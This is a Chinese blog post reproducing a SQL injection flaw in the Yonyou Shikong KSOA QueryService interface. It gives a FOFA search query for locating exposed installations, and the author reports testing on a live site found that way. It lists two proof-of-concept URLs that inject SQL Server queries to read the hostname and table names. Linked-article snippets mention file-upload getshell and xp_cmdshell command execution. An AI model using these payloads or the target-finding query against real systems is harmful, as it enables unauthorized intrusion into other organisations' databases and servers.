用友-时空KSOA QueryService sql注入漏洞复现_笔记

最新推荐文章于 2024-06-11 17:44:48 发布
最新推荐文章于 2024-06-11 17:44:48 发布
阅读量211 收藏 1
点赞数 7
分类专栏: 漏洞复现 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50488257/article/details/138213493
版权

在网上看见大佬们发的用友-时空KSOA QueryService sql注入漏洞复现文章,尝试漏洞复现。

借鉴文章:用友-时空KSOA QueryService sql注入漏洞-CSDN博客

fofa语句:

app="用友-时空KSOA"

fofa上找了一个在用站点

访问接口信息

http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=

感觉应该有sql注入

发现使用的数据库是SQL Server数据库,发现忘记SQL Server数据库的语句了。

在网上查资料。

被自己菜笑了。

资料:https://blog.51cto.com/u_16213569/8134987     

使用查看主机名、查询当前库第一个表名来验证sql注入是否存在

poc

http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=(select%20host_name())

查询到了对应主机名

poc

http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27U%27)

查看第一个数据库的表名,这里就不放图片了。

要努力啊啊啊!!
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
用友时空KSOA存在sql注入漏洞 附POC
nnn2188185的博客
09-24 369
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,该产品common/dept.jsp接口存在SQL注入漏洞
用友时空KSOA SQL注入漏洞复现
0xSec
08-13 2413
用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
用友时空KSOA软件前台文件上传漏洞
holyxp的博客
08-01 602
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件上传漏洞+getshell
随心所欲不逾矩
09-19 796
软件介绍:用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。emmm,怎么说呢,就是又在一次加班码到晚上十点的时候,挖掘到了一个用友时空ksoa v9.0文件上传漏洞。开开心心连接马,嗯,连不上,emm,头疼,有防御。上传成功是这个模样,嗯,被解析了。但是,发现,有360主动防御,很头疼。
用友时空KSOA UploadImage任意文件上传漏洞
Keepb1ue的博客
12-24 1902
用友时空 KSOA 是根据流通企业前沿的IT需求推出的统的IT基础架构,它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。由于用友时空设备开放了文件上传功能,但未鉴权且上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到服务器,再利用该漏洞获取权限并执行任意命令。2.设置内容检测机制和白名单上传机制。1.通过防火墙等安全设备限制访问策略。3.如非必要,禁止公网访问该系统。app=“用友-时空KSOA
注入之漏洞
zkaqlaoniao的博客
10-16 144
KSOA可以通过不同产品的组合,帮助流通领域企业实现“交易自动化、管理信息化、决策智能化、商务电子化”的目标,满足企业决策层、管理层、操作层不用应用者的需求。用友时空 KSOA 软件存在存在sql注入漏洞,可利用该漏洞获取系统敏感信息。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。解密81dc9bdb52d04dc20036dbd8313ed055(MD5值)POC内的1234可自定义内容。
漏洞复现用友时空-KSOA-ImageUpload-文件上传
知黑而守白
03-26 88
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA ImageUpload 接口存在一个任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
用友时空ccerp、ksoa zhiydoc表kl解密函数
05-27
放在数据库执行 使用方法 select dbo.jm_kl(kl),* from zhiydoc
用友时空ksoa仓储系统.doc
10-03
用友时空 KSOA 仓储系统拣货功能操作说明 用友时空 KSOA 仓储系统是基于某批发配送企业的仓库自动化管理系统,旨在实现客户订单自动分解到各楼层,并由拣货人员自助索取拣货单。为了实现这个功能,系统需要进行多个...
用友时空KSOA仓储系统.doc
10-03
用友时空KSOA仓储系统拣货功能操作说明 用友时空KSOA仓储系统是一种智能化的仓储管理系统,旨在提高仓储管理效率和准确性。在这个系统中,拣货功能是一个核心模块,旨在实现自动化的拣货过程。下面是对用友时空KSOA...
用友时空密码查看器
02-17
用友时空KSOA密码查看器
用友时空KSOA sKeyvalue SQL注入漏洞复现
Keepb1ue的博客
12-29 584
用友KSOA用友集团推出的一款基于SOA架构的企业级应用平台,旨在为企业提供全面的信息化解决方案。它包括了多个模块,如财务管理、人力资源管理、供应链管理等,可以帮助企业实现数字化转型。它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
用友-时空KSOA QueryService sql注入漏洞
weixin_43567873的博客
03-05 52
用友-时空KSOA QueryService sql注入漏洞
用友时空KSOA ImageUpload任意文件上传漏洞复现+利用
0xSec
04-04 2139
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8854
用友NC 漏洞汇总
用友时空 KSOA 多处SQL注入漏洞复现
0xSec
12-13 1175
用友时空 KSOA 系统 PayBill、QueryService、linkadd.jsp等接口处存在 sql 注入漏洞,攻击者可通过这些漏洞获取数据库权限,启用xp_cmdshell 可执行任意命令获取服务器权限。
用友时空KSOAV9.0文件上传漏洞复现
weixin_53884648的博客
05-22 1168
用友时空文件上传漏洞复现
无胁科技-TVD每日漏洞情报-2022-7-30
wuthreat无胁科技的博客
07-30 878
参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?漏洞编号CNVD-2022-14717。相关涉及用友时空KSOA软件。...
mysql-线上常用运维sql-2
最新发布
jll126的博客
06-11 360
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值